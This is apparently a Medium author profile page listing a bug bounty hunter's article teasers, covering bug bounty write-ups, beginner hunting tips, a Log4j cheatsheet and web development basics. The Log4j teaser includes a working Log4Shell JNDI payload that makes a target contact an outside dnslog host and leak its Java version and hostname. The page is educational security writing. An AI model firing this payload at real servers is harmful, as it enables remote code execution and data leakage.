Open in app

Sign In

Write

Sign In

Anton (therceman)
Anton (therceman)

1.6K Followers

Home

Lists

About

Published in

InfoSec Write-ups

·Pinned

Bug Bounty Writeup: $2500 Reward for Session Hijack via Chained Attack

A detailed Bug Bounty Writeup explaining a session hijack vulnerability that was exploited using Cross-Site Scripting (XSS), coupled with a Web Application Firewall (WAF) bypass and Server-Side Template Injection (SSTI). This in-depth analysis explores how these chained vulnerabilities were discovered, earning a $2500 reward. Hello 👋 First of all, I’d…

Cybersecurity

6 min read

Bug Bounty Writeup: $2500 Reward for Session Hijack via Chained Attack
Bug Bounty Writeup: $2500 Reward for Session Hijack via Chained Attack
Cybersecurity

6 min read


Published in

InfoSec Write-ups

·Pinned

How to Find Your First Bug: Motivation and Tips for Bug Bounty Hunting

Have you recently entered the world of bug bounty hunting and are having trouble locating your first bug? Don’t worry, you’re not alone. It’s a common challenge that requires persistence and dedication. In this article, I have prepared some helpful tips to guide you on your bug bounty journey. First…

Cybersecurity

3 min read

How to Find Your First Bug: Motivation and Tips for Bug Bounty Hunting
How to Find Your First Bug: Motivation and Tips for Bug Bounty Hunting
Cybersecurity

3 min read


Published in

InfoSec Write-ups

·Pinned

$350 XSS in 15 minutes

Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution — Hello 👋 This is my first and last Bug Bounty Writeup this year. 😀 I am sharing with you my latest XSS finding, which I’ve found 2 weeks ago. This was the fastest and a bit unusual flow that I normally do when I search for XSS. So let’s dive…

Cybersecurity

3 min read

$350 XSS in 15 minutes
$350 XSS in 15 minutes
Cybersecurity

3 min read


Published in

InfoSec Write-ups

·Pinned

How To Start Bug Bounty Hunting

Short & Basic Intro to Bug Bounty World — I recommend registering on the following crowdsourced cybersecurity platforms (bug bounty platforms): https://www.bugcrowd.com https://www.hackerone.com https://www.intigriti.com Searching for bugs in the wild (not on a bug bounty platform) can be great, but it may not be the best place to start as there is no guarantee that the company will respond…

Cybersecurity

3 min read

How To Start Bug Bounty Hunting
How To Start Bug Bounty Hunting
Cybersecurity

3 min read


Published in

InfoSec Write-ups

·Dec 14, 2021

Log4j Vulnerability Cheatsheet

How it works, where to practice, and how to identify Description Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021–44228 (Log4Shell) Affected versions — Apache log4j 2.0-beta9 ≤ 2.14.1 How It Works Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}

Log4j

3 min read

Log4j Vulnerability Cheatsheet
Log4j Vulnerability Cheatsheet
Log4j

3 min read


Published in

JavaScript in Plain English

·Aug 17, 2021

What is a Website URL?

Web Address Example Scheme and its Mandatory Components Explained — URL (Uniform Resource Locator) is the so-called address of the desired resource on the internet that consists of multiple components/parts. Let’s take a look at the following URL https://admin:pass@a.b.web.com:888/users/index.php?q=bob&role=2#info This URL consist of the following components: Scheme https:// Authority admin:pass@

Programming

3 min read

What Is a Website URL?
What Is a Website URL?
Programming

3 min read


Published in

JavaScript in Plain English

·Aug 13, 2021

What is a JavaScript Recursive Function?

Advantages of recursion technology clarified — As website developers, we encounter recursive functions every day. This tutorial will explore the pattern of problems, which can be solved using recursion. Basic Concept function recurse() { // 2nd call to itself recurse(); } // 1st call recurse(); Each recursive function must have a base case (also called termination condition), where…

JavaScript

4 min read

🔁 Understand JavaScript Recursion
🔁 Understand JavaScript Recursion
JavaScript

4 min read


Published in

JavaScript in Plain English

·Aug 11, 2021

WebP: The Image Format For Web Devs Who Care About Performance

WEBP is image compression technology that creates smaller file sizes without compromising on quality It can reduce the file size from 20% to 80% (or even more) compared to JPEG, PNG, and GIF

Web

2 min read

WebP: The Image Format For Web Devs Who Care About Performance
WebP: The Image Format For Web Devs Who Care About Performance
Web

2 min read

Anton (therceman)

Anton (therceman)

1.6K Followers

💰 Bug Bounty Hunter 💻 Software Developer 🌐 www.therceman.dev

Following
  • Tic

    Tic

  • Shubham Khanna

    Shubham Khanna

  • Kristie Leong M.D.

    Kristie Leong M.D.

  • Clive Thompson

    Clive Thompson

  • Kayla Tackett

    Kayla Tackett

See all (3,993)

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams